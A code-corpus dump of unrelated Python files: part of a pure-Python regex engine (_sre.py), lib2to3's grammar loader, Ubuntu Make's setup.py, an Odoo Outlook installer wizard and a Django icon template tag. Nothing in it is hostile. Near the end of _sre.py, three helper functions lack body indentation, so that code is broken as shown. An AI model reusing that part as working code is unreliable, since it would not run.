        #self._log(ctx, "BRANCH")
        ctx.state.marks_push()
        ctx.skip_code(1)
        current_branch_length = ctx.peek_code(0)
        while current_branch_length:
            # The following tries to shortcut branches starting with a
            # (unmatched) literal. _sre.c also shortcuts charsets here.
            if not (ctx.peek_code(1) == OPCODES["literal"] and \
                    (ctx.at_end() or ctx.peek_code(2) != ord(ctx.peek_char()))):
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(1)
                #print("_sre.py:803:op_branch")
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.state.marks_pop_keep()
            ctx.skip_code(current_branch_length)
            current_branch_length = ctx.peek_code(0)
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        #print('_sre.py:line805, update context.has_matched variable')
        yield True
    def op_repeat_one(self, ctx):
        # match repeated sequence (maximizing).
        # this operator only works if the repeated item is exactly one character
        # wide, and we're not already collecting backtracking points.
        # <REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
        mincount = ctx.peek_code(2)
        maxcount = ctx.peek_code(3)
        #print("repeat one", mincount, maxcount)
        #self._log(ctx, "REPEAT_ONE", mincount, maxcount)
        if ctx.remaining_chars() < mincount:
            ctx.has_matched = False
            yield True
        ctx.state.string_position = ctx.string_position
        count = self.count_repetitions(ctx, maxcount)
        ctx.skip_char(count)
        if count < mincount:
            ctx.has_matched = False
            yield True
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
            # tail is empty.  we're finished
            ctx.state.string_position = ctx.string_position
            ctx.has_matched = True
            yield True
        ctx.state.marks_push()
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["literal"]:
            # Special case: Tail starts with a literal. Skip positions where
            # the rest of the pattern cannot possibly match.
            char = ctx.peek_code(ctx.peek_code(1) + 2)
            while True:
                while count >= mincount and \
                        (ctx.at_end() or ord(ctx.peek_char()) != char):
                    ctx.skip_char(-1)
                    count -= 1
                if count < mincount:
                    break
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
                #print("_sre.py:856:push_new_context")
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.skip_char(-1)
                count -= 1
                ctx.state.marks_pop_keep()
        else:
            # General case: backtracking
            while count >= mincount:
                ctx.state.string_position = ctx.string_position
                child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
                yield False
                if child_context.has_matched:
                    ctx.has_matched = True
                    yield True
                ctx.skip_char(-1)
                count -= 1
                ctx.state.marks_pop_keep()
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        #ctx.has_matched = True   # <== this should be True (so match object gets returned to program)
        yield True
    def op_min_repeat_one(self, ctx):
        # match repeated sequence (minimizing)
        # <MIN_REPEAT_ONE> <skip> <1=min> <2=max> item <SUCCESS> tail
        mincount = ctx.peek_code(2)
        maxcount = ctx.peek_code(3)
        #self._log(ctx, "MIN_REPEAT_ONE", mincount, maxcount)
        if ctx.remaining_chars() < mincount:
            ctx.has_matched = False
            yield True
        ctx.state.string_position = ctx.string_position
        if mincount == 0:
            count = 0
        else:
            count = self.count_repetitions(ctx, mincount)
            if count < mincount:
                ctx.has_matched = False
                #print('_sre.py:line891, update context.has_matched variable')
                yield True
            ctx.skip_char(count)
        if ctx.peek_code(ctx.peek_code(1) + 1) == OPCODES["success"]:
            # tail is empty.  we're finished
            ctx.state.string_position = ctx.string_position
            ctx.has_matched = True
            yield True
        ctx.state.marks_push()
        while maxcount == MAXREPEAT or count <= maxcount:
            ctx.state.string_position = ctx.string_position
            child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
            #print('_sre.py:916:push new context')
            yield False
            if child_context.has_matched:
                ctx.has_matched = True
                yield True
            ctx.state.string_position = ctx.string_position
            if self.count_repetitions(ctx, 1) == 0:
                break
            ctx.skip_char(1)
            count += 1
            ctx.state.marks_pop_keep()
        ctx.state.marks_pop_discard()
        ctx.has_matched = False
        yield True
    def op_repeat(self, ctx):
        # create repeat context.  all the hard work is done by the UNTIL
        # operator (MAX_UNTIL, MIN_UNTIL)
        # <REPEAT> <skip> <1=min> <2=max> item <UNTIL> tail
        #self._log(ctx, "REPEAT", ctx.peek_code(2), ctx.peek_code(3))
        #if ctx.state.repeat is None:
        #   print("951:ctx.state.repeat is None")
        #   #ctx.state.repeat=_RepeatContext(ctx)
        repeat = _RepeatContext(ctx)
        ctx.state.repeat = repeat
        ctx.state.string_position = ctx.string_position
        child_context = ctx.push_new_context(ctx.peek_code(1) + 1)
        #print("_sre.py:941:push new context", id(child_context))
        #print(child_context.state.repeat)
        #print(ctx.state.repeat)
        # are these two yields causing the issue?
        yield False
        ctx.state.repeat = repeat.previous
        ctx.has_matched = child_context.has_matched
        yield True
    def op_max_until(self, ctx):
        # maximizing repeat
        # <REPEAT> <skip> <1=min> <2=max> item <MAX_UNTIL> tail
        repeat = ctx.state.repeat
        #print("op_max_until") #, id(ctx.state.repeat))
        if repeat is None:
            #print(id(ctx), id(ctx.state))
            raise RuntimeError("Internal re error: MAX_UNTIL without REPEAT.")
        mincount = repeat.peek_code(2)
        maxcount = repeat.peek_code(3)
        ctx.state.string_position = ctx.string_position
        count = repeat.count + 1
        #self._log(ctx, "MAX_UNTIL", count)
        if count < mincount:
            # not enough matches
            repeat.count = count
            child_context = repeat.push_new_context(4)
            yield False
            ctx.has_matched = child_context.has_matched
            if not ctx.has_matched:
                repeat.count = count - 1
                ctx.state.string_position = ctx.string_position
            yield True
        if (count < maxcount or maxcount == MAXREPEAT) \
                and ctx.state.string_position != repeat.last_position:
            # we may have enough matches, if we can match another item, do so
            repeat.count = count
            ctx.state.marks_push()
            save_last_position = repeat.last_position # zero-width match protection
            repeat.last_position = ctx.state.string_position
            child_context = repeat.push_new_context(4)
            yield False
            repeat.last_position = save_last_position
            if child_context.has_matched:
                ctx.state.marks_pop_discard()
                ctx.has_matched = True
                yield True
            ctx.state.marks_pop()
            repeat.count = count - 1
            ctx.state.string_position = ctx.string_position
        # cannot match more repeated items here.  make sure the tail matches
        ctx.state.repeat = repeat.previous
        child_context = ctx.push_new_context(1)
        #print("_sre.py:987:op_max_until")
        yield False
        ctx.has_matched = child_context.has_matched
        if not ctx.has_matched:
            ctx.state.repeat = repeat
            ctx.state.string_position = ctx.string_position
        yield True
    def op_min_until(self, ctx):
        # minimizing repeat
        # <REPEAT> <skip> <1=min> <2=max> item <MIN_UNTIL> tail
        repeat = ctx.state.repeat
        if repeat is None:
            raise RuntimeError("Internal re error: MIN_UNTIL without REPEAT.")
        mincount = repeat.peek_code(2)
        maxcount = repeat.peek_code(3)
        ctx.state.string_position = ctx.string_position
        count = repeat.count + 1
        #self._log(ctx, "MIN_UNTIL", count)
        if count < mincount:
            # not enough matches
            repeat.count = count
            child_context = repeat.push_new_context(4)
            yield False
            ctx.has_matched = child_context.has_matched
            if not ctx.has_matched:
                repeat.count = count - 1
                ctx.state.string_position = ctx.string_position
            yield True
        # see if the tail matches
        ctx.state.marks_push()
        ctx.state.repeat = repeat.previous
        child_context = ctx.push_new_context(1)
        #print('_sre.py:1022:push new context')
        yield False
        if child_context.has_matched:
            ctx.has_matched = True
            yield True
        ctx.state.repeat = repeat
        ctx.state.string_position = ctx.string_position
        ctx.state.marks_pop()
        # match more until tail matches
        if count >= maxcount and maxcount != MAXREPEAT:
            ctx.has_matched = False
            #print('_sre.py:line1022, update context.has_matched variable')
            yield True
        repeat.count = count
        child_context = repeat.push_new_context(4)
        yield False
        ctx.has_matched = child_context.has_matched
        if not ctx.has_matched:
            repeat.count = count - 1
            ctx.state.string_position = ctx.string_position
        yield True
    def general_op_groupref(self, ctx, decorate=lambda x: x):
        # Shared body for GROUPREF / GROUPREF_IGNORE: re-match the text
        # captured by a previous group (optionally case-folded).
        group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
        if group_start is None or group_end is None or group_end < group_start:
            ctx.has_matched = False
            return True
        while group_start < group_end:
            if ctx.at_end() or decorate(ord(ctx.peek_char())) \
                                != decorate(ord(ctx.state.string[group_start])):
                ctx.has_matched = False
                #print('_sre.py:line1042, update context.has_matched variable')
                return True
            group_start += 1
            ctx.skip_char(1)
        ctx.skip_code(2)
        return True
    def op_groupref(self, ctx):
        # match backreference
        # <GROUPREF> <zero-based group index>
        #self._log(ctx, "GROUPREF", ctx.peek_code(1))
        return self.general_op_groupref(ctx)
    def op_groupref_ignore(self, ctx):
        # match backreference case-insensitive
        # <GROUPREF_IGNORE> <zero-based group index>
        #self._log(ctx, "GROUPREF_IGNORE", ctx.peek_code(1))
        return self.general_op_groupref(ctx, ctx.state.lower)
    def op_groupref_exists(self, ctx):
        # <GROUPREF_EXISTS> <group> <skip> codeyes <JUMP> codeno ...
        #self._log(ctx, "GROUPREF_EXISTS", ctx.peek_code(1))
        group_start, group_end = ctx.state.get_marks(ctx.peek_code(1))
        if group_start is None or group_end is None or group_end < group_start:
            ctx.skip_code(ctx.peek_code(2) + 1)
        else:
            ctx.skip_code(3)
        return True
    def op_assert(self, ctx):
        # assert subpattern
        # <ASSERT> <skip> <back> <pattern>
        #self._log(ctx, "ASSERT", ctx.peek_code(2))
        ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
        if ctx.state.string_position < 0:
            ctx.has_matched = False
            yield True
        child_context = ctx.push_new_context(3)
        yield False
        if child_context.has_matched:
            ctx.skip_code(ctx.peek_code(1) + 1)
        else:
            ctx.has_matched = False
        yield True
    def op_assert_not(self, ctx):
        # assert not subpattern
        # <ASSERT_NOT> <skip> <back> <pattern>
        #self._log(ctx, "ASSERT_NOT", ctx.peek_code(2))
        ctx.state.string_position = ctx.string_position - ctx.peek_code(2)
        if ctx.state.string_position >= 0:
            child_context = ctx.push_new_context(3)
            yield False
            if child_context.has_matched:
                ctx.has_matched = False
                yield True
        ctx.skip_code(ctx.peek_code(1) + 1)
        yield True
    def unknown(self, ctx):
        #self._log(ctx, "UNKNOWN", ctx.peek_code())
        raise RuntimeError("Internal re error. Unknown opcode: %s" % ctx.peek_code())
    def check_charset(self, ctx, char):
        """Checks whether a character matches set of arbitrary length. Assumes
        the code pointer is at the first member of the set."""
        self.set_dispatcher.reset(char)
        save_position = ctx.code_position
        result = None
        while result is None:
            result = self.set_dispatcher.dispatch(ctx.peek_code(), ctx)
        ctx.code_position = save_position
        #print("_sre.py:1123:check_charset", result)
        return result
    def count_repetitions(self, ctx, maxcount):
        """Returns the number of repetitions of a single item, starting from the
        current string position. The code pointer is expected to point to a
        REPEAT_ONE operation (with the repeated 4 ahead)."""
        count = 0
        real_maxcount = ctx.state.end - ctx.string_position
        if maxcount < real_maxcount and maxcount != MAXREPEAT:
            real_maxcount = maxcount
        # XXX could special case every single character pattern here, as in C.
        # This is a general solution, a bit hackisch, but works and should be
        # efficient.
        code_position = ctx.code_position
        string_position = ctx.string_position
        ctx.skip_code(4)
        reset_position = ctx.code_position
        while count < real_maxcount:
            # this works because the single character pattern is followed by
            # a success opcode
            ctx.code_position = reset_position
            self.dispatch(ctx.peek_code(), ctx)
            #print("count_repetitions", ctx.has_matched, count)
            if ctx.has_matched is False: # could be None as well
                break
            count += 1
            ctx.has_matched = None
        ctx.code_position = code_position
        ctx.string_position = string_position
        return count
    def _log(self, context, opname, *args):
        arg_string = ("%s " * len(args)) % args
        _log("|%s|%s|%s %s" % (context.pattern_codes,
            context.string_position, opname, arg_string))
# Build the opcode -> handler table now that the class body is complete.
_OpcodeDispatcher.build_dispatch_table(OPCODES, "op_")
class _CharsetDispatcher(_Dispatcher):
    """Decides whether a character belongs to a compiled character set.

    reset() installs the candidate character; the set_* handlers are then
    dispatched over the set's opcodes.  A handler returns self.ok on a hit,
    (not self.ok) at <FAILURE>, or falls through (None) after skipping its
    codes.  NEGATE flips self.ok so the same handlers test non-membership.
    """

    def __init__(self):
        self.ch_dispatcher = _ChcodeDispatcher()

    def reset(self, char):
        # Candidate character ordinal and the current test polarity.
        self.char = char
        self.ok = True

    def set_failure(self, ctx):
        return not self.ok

    def set_literal(self, ctx):
        # <LITERAL> <code>
        if ctx.peek_code(1) == self.char:
            return self.ok
        else:
            ctx.skip_code(2)

    def set_category(self, ctx):
        # <CATEGORY> <code>
        if self.ch_dispatcher.dispatch(ctx.peek_code(1), ctx):
            return self.ok
        else:
            ctx.skip_code(2)

    def set_charset(self, ctx):
        # <CHARSET> <bitmap> (16 bits per code word)
        char_code = self.char
        ctx.skip_code(1) # point to beginning of bitmap
        if CODESIZE == 2:
            if char_code < 256 and ctx.peek_code(char_code >> 4) \
                    & (1 << (char_code & 15)):
                return self.ok
            ctx.skip_code(16) # skip bitmap
        else:
            if char_code < 256 and ctx.peek_code(char_code >> 5) \
                    & (1 << (char_code & 31)):
                return self.ok
            ctx.skip_code(8) # skip bitmap

    def set_range(self, ctx):
        # <RANGE> <lower> <upper>
        if ctx.peek_code(1) <= self.char <= ctx.peek_code(2):
            return self.ok
        ctx.skip_code(3)

    def set_negate(self, ctx):
        self.ok = not self.ok
        ctx.skip_code(1)

    def set_bigcharset(self, ctx):
        # <BIGCHARSET> <blockcount> <256 blockindices> <blocks>
        # Unsupported under Brython: the array module is not available.
        # Bug fix: the original raised "NotImplementationError", a name that
        # does not exist, so reaching this path died with a NameError instead
        # of the intended exception.
        raise NotImplementedError(
            "_sre.py: set_bigcharset, array not implemented")
        # Reference implementation kept below for documentation (unreachable).
        char_code = self.char
        count = ctx.peek_code(1)
        ctx.skip_code(2)
        if char_code < 65536:
            block_index = char_code >> 8
            # NB: there are CODESIZE block indices per bytecode
            a = array.array("B")
            a.fromstring(array.array(CODESIZE == 2 and "H" or "I",
                    [ctx.peek_code(block_index // CODESIZE)]).tostring())
            block = a[block_index % CODESIZE]
            ctx.skip_code(256 // CODESIZE) # skip block indices
            block_value = ctx.peek_code(block * (32 // CODESIZE)
                    + ((char_code & 255) >> (CODESIZE == 2 and 4 or 5)))
            if block_value & (1 << (char_code & ((8 * CODESIZE) - 1))):
                return self.ok
        else:
            ctx.skip_code(256 // CODESIZE) # skip block indices
            ctx.skip_code(count * (32 // CODESIZE)) # skip blocks

    def unknown(self, ctx):
        return False
_CharsetDispatcher.build_dispatch_table(OPCODES, "set_")
class _AtcodeDispatcher(_Dispatcher):
    """Evaluates AT codes (anchors such as ^, $, \\b, \\B) on a context."""

    def at_beginning(self, ctx):
        return ctx.at_beginning()
    at_beginning_string = at_beginning

    def at_beginning_line(self, ctx):
        if ctx.at_beginning():
            return True
        return _is_linebreak(ctx.peek_char(-1))

    def at_end(self, ctx):
        # True at the very end, or just before a trailing newline.
        if ctx.at_end():
            return True
        return ctx.remaining_chars() == 1 and ctx.at_linebreak()

    def at_end_line(self, ctx):
        return ctx.at_end() or ctx.at_linebreak()

    def at_end_string(self, ctx):
        return ctx.at_end()

    def at_boundary(self, ctx):
        return ctx.at_boundary(_is_word)

    def at_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_word)

    def at_loc_boundary(self, ctx):
        return ctx.at_boundary(_is_loc_word)

    def at_loc_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_loc_word)

    def at_uni_boundary(self, ctx):
        return ctx.at_boundary(_is_uni_word)

    def at_uni_non_boundary(self, ctx):
        return not ctx.at_boundary(_is_uni_word)

    def unknown(self, ctx):
        return False
_AtcodeDispatcher.build_dispatch_table(ATCODES, "")
class _ChcodeDispatcher(_Dispatcher):
    """Evaluates CATEGORY codes (\\d, \\D, \\s, \\S, \\w, \\W and their
    locale/Unicode variants) against the context's current character."""

    def category_digit(self, ctx):
        ch = ctx.peek_char()
        return _is_digit(ch)

    def category_not_digit(self, ctx):
        ch = ctx.peek_char()
        return not _is_digit(ch)

    def category_space(self, ctx):
        ch = ctx.peek_char()
        return _is_space(ch)

    def category_not_space(self, ctx):
        ch = ctx.peek_char()
        return not _is_space(ch)

    def category_word(self, ctx):
        ch = ctx.peek_char()
        return _is_word(ch)

    def category_not_word(self, ctx):
        ch = ctx.peek_char()
        return not _is_word(ch)

    def category_linebreak(self, ctx):
        ch = ctx.peek_char()
        return _is_linebreak(ch)

    def category_not_linebreak(self, ctx):
        ch = ctx.peek_char()
        return not _is_linebreak(ch)

    def category_loc_word(self, ctx):
        ch = ctx.peek_char()
        return _is_loc_word(ch)

    def category_loc_not_word(self, ctx):
        ch = ctx.peek_char()
        return not _is_loc_word(ch)

    def category_uni_digit(self, ctx):
        ch = ctx.peek_char()
        return ch.isdigit()

    def category_uni_not_digit(self, ctx):
        ch = ctx.peek_char()
        return not ch.isdigit()

    def category_uni_space(self, ctx):
        ch = ctx.peek_char()
        return ch.isspace()

    def category_uni_not_space(self, ctx):
        ch = ctx.peek_char()
        return not ch.isspace()

    def category_uni_word(self, ctx):
        ch = ctx.peek_char()
        return _is_uni_word(ch)

    def category_uni_not_word(self, ctx):
        ch = ctx.peek_char()
        return not _is_uni_word(ch)

    def category_uni_linebreak(self, ctx):
        ch = ctx.peek_char()
        return ord(ch) in _uni_linebreaks

    def category_uni_not_linebreak(self, ctx):
        ch = ctx.peek_char()
        return ord(ch) not in _uni_linebreaks

    def unknown(self, ctx):
        return False
_ChcodeDispatcher.build_dispatch_table(CHCODES, "")
# Per-character classification bit flags for the 128 ASCII codepoints.
# Bits actually read below: 0x01 = digit (_is_digit), 0x02 = space
# (_is_space), 0x10 = word character (_is_word; includes '_', value 16).
# The 0x04/0x08 bits presumably mirror _sre.c's linebreak/alnum masks --
# they are not consulted in this file; confirm against _sre.c.
_ascii_char_info = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 6, 2,
2, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 25, 25, 25, 25, 25, 25, 25,
25, 25, 0, 0, 0, 0, 0, 0, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0,
0, 0, 16, 0, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24,
24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 0, 0, 0, 0, 0 ]
def _is_digit(char):
    """ASCII-mode digit test, driven by the flag table (bit 0x01)."""
    cp = ord(char)
    return cp < 128 and _ascii_char_info[cp] & 1
def _is_space(char):
    """ASCII-mode whitespace test, driven by the flag table (bit 0x02)."""
    cp = ord(char)
    return cp < 128 and _ascii_char_info[cp] & 2
def _is_word(char):
    """ASCII-mode word-character test (letters, digits, underscore)."""
    # NB: non-ASCII chars aren't words according to _sre.c
    cp = ord(char)
    return cp < 128 and _ascii_char_info[cp] & 16
def _is_loc_word(char):
return (not (ord(char) & ~255) and char.isalnum()) or char == '_'
def _is_uni_word(char):
# not valid in python 3
#return unichr(ord(char)).isalnum() or char == '_'
return chr(ord(char)).isalnum() or char == '_'
def _is_linebreak(char):
return char == "\n"
# Static list of all unicode codepoints reported by Py_UNICODE_ISLINEBREAK.
# Used by the category_uni_linebreak handlers above (membership by ord()).
_uni_linebreaks = [10, 13, 28, 29, 30, 133, 8232, 8233]
def _log(message):
    # Debug tracing hook, deliberately disabled; flip the constant to 1
    # to print engine trace messages.
    if 0:
        print(message)
| gpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.3.0/Lib/lib2to3/pygram.py | 170 | 1114 | # Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
"""Export the Python grammar and symbols."""
# Python imports
import os
# Local imports
from .pgen2 import token
from .pgen2 import driver
from . import pytree
# The grammar file
# Both grammar text files ship alongside this module and are compiled
# into pgen2 grammar objects at import time (see bottom of file).
_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__), "Grammar.txt")
_PATTERN_GRAMMAR_FILE = os.path.join(os.path.dirname(__file__),
                                     "PatternGrammar.txt")
class Symbols(object):
    """Namespace exposing every grammar nonterminal as an attribute."""

    def __init__(self, grammar):
        """Initializer.

        Creates an attribute for each grammar symbol (nonterminal),
        whose value is the symbol's type (an int >= 256).
        """
        for symbol_name, symbol_number in grammar.symbol2number.items():
            setattr(self, symbol_name, symbol_number)
# Compile both grammars once at import time so every lib2to3 consumer
# shares the same symbol numbering.
python_grammar = driver.load_grammar(_GRAMMAR_FILE)
python_symbols = Symbols(python_grammar)
# Variant for sources where "print" is an ordinary name, not a keyword.
python_grammar_no_print_statement = python_grammar.copy()
del python_grammar_no_print_statement.keywords["print"]
pattern_grammar = driver.load_grammar(_PATTERN_GRAMMAR_FILE)
pattern_symbols = Symbols(pattern_grammar)
| mit |
jravetch/ubuntu-make | setup.py | 6 | 5396 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Canonical
#
# Authors:
# Didier Roche
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from distutils import cmd
from distutils.command.install_data import install_data as _install_data
from distutils.command.build import build as _build
import gettext
from glob import glob
import os
from setuptools import setup, find_packages
import subprocess
import umake # that initializes the gettext domain
from umake.settings import get_version
# gettext domain established as a side effect of importing umake above.
I18N_DOMAIN = gettext.textdomain()
# Directory holding the .po translation catalogues.
PO_DIR = os.path.join(os.path.dirname(os.curdir), 'po')
def get_requirements(tag_to_detect=""):
    """Gather a list of requirements line per line from tag_to_detect to next tag.

    requirements.txt is split into sections by comment-header ("#...") or
    blank lines.  If tag_to_detect is empty, every requirement is gathered.
    Returns the list of requirement lines.
    """
    requirements = []
    # With an empty tag we collect from the very first line on; the
    # original checked line.startswith(tag) on *every* line, so an empty
    # tag matched (and skipped) all lines and always returned [].
    tag_detected = not tag_to_detect
    with open("requirements.txt") as f:
        for line in f.read().splitlines():
            if line.startswith("#") or line == "":
                # Section boundary: keep collecting only while we are
                # under the wanted tag.
                tag_detected = line.startswith(tag_to_detect)
                continue
            if tag_detected:
                requirements.append(line)
    print(requirements)
    return requirements
#
# add translation support
#
class build(_build):
    # Extend the standard build so the .po -> .mo compilation step
    # (build_trans below) runs as part of every build.
    sub_commands = _build.sub_commands + [('build_trans', None)]
    def run(self):
        _build.run(self)
class build_trans(cmd.Command):
    """Distutils command compiling gettext catalogues with msgfmt."""
    description = 'Compile .po files into .mo files'
    user_options = []
    def initialize_options(self):
        pass
    def finalize_options(self):
        pass
    def run(self):
        for filename in os.listdir(PO_DIR):
            if not filename.endswith('.po'):
                continue
            # Language code is the catalogue filename minus ".po".
            lang = filename[:-3]
            src = os.path.join(PO_DIR, filename)
            dest_path = os.path.join('build', 'locale', lang, 'LC_MESSAGES')
            dest = os.path.join(dest_path, I18N_DOMAIN + '.mo')
            if not os.path.exists(dest_path):
                os.makedirs(dest_path)
            if not os.path.exists(dest):
                print('Compiling {}'.format(src))
                subprocess.call(["msgfmt", src, "--output-file", dest])
            else:
                # Recompile only when the source catalogue is newer.
                # os.stat(...)[8] is st_mtime.
                src_mtime = os.stat(src)[8]
                dest_mtime = os.stat(dest)[8]
                if src_mtime > dest_mtime:
                    print('Compiling {}'.format(src))
                    subprocess.call(["msgfmt", src, "--output-file", dest])
class install_data(_install_data):
    """Install step that also ships the compiled .mo catalogues."""
    def run(self):
        for filename in os.listdir(PO_DIR):
            if not filename.endswith('.po'):
                continue
            lang = filename[:-3]
            # Map build/locale/<lang>/... to share/locale/<lang>/...
            lang_dir = os.path.join('share', 'locale', lang, 'LC_MESSAGES')
            lang_file = os.path.join('build', 'locale', lang, 'LC_MESSAGES', I18N_DOMAIN + '.mo')
            self.data_files.append((lang_dir, [lang_file]))
        _install_data.run(self)
class update_pot(cmd.Command):
    """Regenerate the .pot template by running xgettext over umake/."""
    description = 'Update template for translators'
    user_options = []
    def initialize_options(self):
        pass
    def finalize_options(self):
        pass
    def run(self):
        # NOTE: this local "cmd" shadows the distutils "cmd" module import,
        # which is harmless here since the class statement above already
        # resolved cmd.Command.
        cmd = ['xgettext', '--language=Python', '--keyword=_', '--package-name', I18N_DOMAIN,
               '--output', 'po/{}.pot'.format(I18N_DOMAIN)]
        for path, names, filenames in os.walk(os.path.join(os.curdir, 'umake')):
            for f in filenames:
                if f.endswith('.py'):
                    cmd.append(os.path.join(path, f))
        subprocess.call(cmd)
class update_po(cmd.Command):
    """Merge the current .pot template into every language's .po file."""
    description = 'Update po from pot file'
    user_options = []
    def initialize_options(self):
        pass
    def finalize_options(self):
        pass
    def run(self):
        source_pot = os.path.join(os.curdir, 'po', '{}.pot'.format(I18N_DOMAIN))
        for po_file in glob(os.path.join(os.curdir, 'po', '*.po')):
            subprocess.check_call(["msgmerge", "-U", po_file, source_pot])
setup(
    name="Ubuntu Make",
    version=get_version(),
    packages=find_packages(exclude=["tests*"]),
    package_data={},
    entry_points={
        'console_scripts': [
            # 'udtc' is kept as a legacy alias of the 'umake' entry point.
            'umake = umake:main',
            'udtc = umake:main'
        ],
    },
    data_files=[
        ('lib/python3/dist-packages/umake', ['umake/version']),
        ("share/ubuntu-make/log-confs", glob('log-confs/*.yaml')),
        ('share/zsh/vendor-completions', ['confs/completions/_umake']),
    ],
    # In addition to run all nose tests, that will as well show python warnings
    test_suite="nose.collector",
    # Hook in the i18n-aware command subclasses defined above.
    cmdclass={
        'build': build,
        'build_trans': build_trans,
        'install_data': install_data,
        'update_pot': update_pot,
        'update_po': update_po,
    }
)
| gpl-3.0 |
codekaki/odoo | addons/plugin_outlook/plugin_outlook.py | 92 | 2079 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields
from openerp.osv import osv
from openerp import addons
import base64
class outlook_installer(osv.osv_memory):
    """Transient config wizard exposing download URLs for the Outlook plug-in."""
    _name = 'outlook.installer'
    _inherit = 'res.config.installer'
    _columns = {
        'plugin32': fields.char('Outlook Plug-in 32bits', size=256, readonly=True, help="Outlook plug-in file. Save this file and install it in Outlook."),
        'plugin64': fields.char('Outlook Plug-in 64bits', size=256, readonly=True, help="Outlook plug-in file. Save this file and install it in Outlook."),
    }
    def default_get(self, cr, uid, fields, context=None):
        # Build absolute installer URLs from the configured web base URL.
        res = super(outlook_installer, self).default_get(cr, uid, fields, context)
        base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
        res['plugin32'] = base_url + '/plugin_outlook/static/openerp-outlook-plugin/OpenERPOutlookPluginSetup32.msi'
        res['plugin64'] = base_url + '/plugin_outlook/static/openerp-outlook-plugin/OpenERPOutlookPluginSetup64.msi'
        return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
arkanister/minitickets | lib/utils/html/templatetags/icons.py | 1 | 2009 | # -*- coding: utf-8 -*-
from django import template
from django.template import TemplateSyntaxError, Node
from ..icons.base import Icon
from ..tags import token_kwargs, resolve_kwargs
register = template.Library()
class IconNode(Node):
    """Template node that renders an Icon instance (or an icon name) as HTML."""

    def __init__(self, _icon, kwargs=None):
        super(IconNode, self).__init__()
        self.icon = _icon
        self.kwargs = {} if kwargs is None else kwargs

    def render(self, context):
        resolved = self.icon.resolve(context)
        # A ready-made Icon renders itself directly.
        if isinstance(resolved, Icon):
            return resolved.as_html()
        # Otherwise build an Icon from the resolved name plus tag options;
        # whatever is left in the options dict becomes HTML attributes.
        options = resolve_kwargs(self.kwargs, context)
        built = Icon(
            resolved,
            prefix=options.pop('prefix', None),
            content=options.pop('content', None),
            html_tag=options.pop('html_tag', None),
            attrs=options,
        )
        return built.as_html()
@register.tag
def icon(parser, token):
    """
    Render a HTML icon.
    The tag can be given either a `.Icon` object or a name of the icon.
    An optional second argument can specify the icon prefix to use.
    An optional third argument can specify the icon html tag to use.
    An optional fourth argument can specify the icon content to use.
    Others arguments can specify any html attribute to use.
    Example::
        {% icon 'icon' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
        {% icon 'icon' 'prefix'='fa-' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
        {% icon 'icon' 'prefix'='fa-' 'html_tag'='b' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
        {% icon 'icon' 'prefix'='fa-' 'html_tag'='b' 'content'='R$' 'kwarg1'='value1' 'kwarg2'='value2' ... %}
    """
    bits = token.split_contents()
    # split_contents() always yields the tag name first.
    tag = bits.pop(0)
    try:
        _icon = parser.compile_filter(bits.pop(0))
    except IndexError:
        # BUG FIX: list.pop raises IndexError (not ValueError), so the
        # original "except ValueError" never fired and a missing icon
        # argument escaped as a raw IndexError; it also read bits[0]
        # after the tag name had been popped.
        raise TemplateSyntaxError("'%s' must be given a icon." % tag)
    kwargs = {}
    # split optional args
    if len(bits):
        kwargs = token_kwargs(bits, parser)
    return IconNode(_icon, kwargs=kwargs)
